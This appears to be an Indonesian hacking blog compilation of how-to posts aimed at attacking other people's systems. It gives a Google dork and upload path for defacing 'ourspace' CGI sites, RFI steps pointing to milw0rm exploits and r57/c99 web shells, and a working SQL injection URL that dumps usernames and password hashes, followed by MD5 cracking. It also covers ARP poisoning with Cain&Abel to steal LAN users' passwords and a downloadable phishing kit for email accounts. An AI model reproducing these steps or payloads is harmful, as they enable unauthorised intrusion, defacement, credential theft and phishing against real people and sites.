pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.

1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di cuba
misalnya neh :

Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi

4. Setelah itu muncul upload files

5. Lu bikin html yang bagus terus upload dah...


Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
Code:
- http://milw0rm.com/exploits/1779 - http://milw0rm.com/exploits/1913 - http://milw0rm.com/exploits/4276

selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)

3. Selamat mencoba !

SQL Injection
--------------

Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.

2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :

Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*


3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php

4. Selamat Mencuba

Cara mudah menghack LAN (Local Area Network)

0 komentar
Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWs57GXUc17EtPi4ZY0FP4MExNGGKLvLJcuekdCCCrSFV_ekh7LqJkPwJ-PpsQ4VS-XVmaUuDKKdFpPXi-uB0S60HW9ZwBNN2sGXoq1JfuRCH7IYX4BJ_Br-zyQgfcYffoPlygtTr_A4U/s320/hacking_big.jpg
* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya


Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html


Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

  1. * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
    * Buka program Cain anda
    * Klik pada bagian configure
    * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
    * Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
    Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
    * Setelah itu apply settingannya dan klik ok
    * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
    * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
    * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
    * Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
    * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
    * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
    * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
    * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
    * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
    * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

cara Hack Email

0 komentar
hello xxxboycomunity ini adalah blog baru saya blog ini hanya soal hacking
http://3.bp.blogspot.com/_JRKUuP01hbY/TOaTd9f3iaI/AAAAAAAAAAw/GTEvFSMRnAU/S1600-R/imgbas-hacker2007.jpg.gifok sekarang saya mau memberti tau cara menghack email ( yahoo gmail atau hotmail )
ingat hacker itu masih punya kode etik jadi tidak diperkenankan untuk mengahancur, merusak, dan selalu bersifat merugikan.

mengcracking email adalah cracking tingkat tinggi setelah bagaimana cara pembobolan bank, jadi ilmu ini sangat-sangat dirahasiakan


sulit untuk di jelaskan maka dari itu silahkan download sajah  disini atau http://www.ziddu.com/download/4965378/HackEmail.rar.html
sudah mendownload ??

> lihat turorialnya dahulu [dalam video].

> lalu ubah file .htm yang terlampir satu file disana [bernama : yahoo] buka dengan notepad. cara merubahnya dengan notepad : klik kanan file yahoo, open with, lalu klik notepad.

> setelah terbuka notepad tulisan "ISI NAMA SESUAI KEINGINAN ANDA" itu rubah dengan nama terserah bisa dirubah dengan nama terserah anda.

> lalu coba lihat lagi video tutorialnya.


oke ?? sudah selesai sampai disini.

see u next hacking post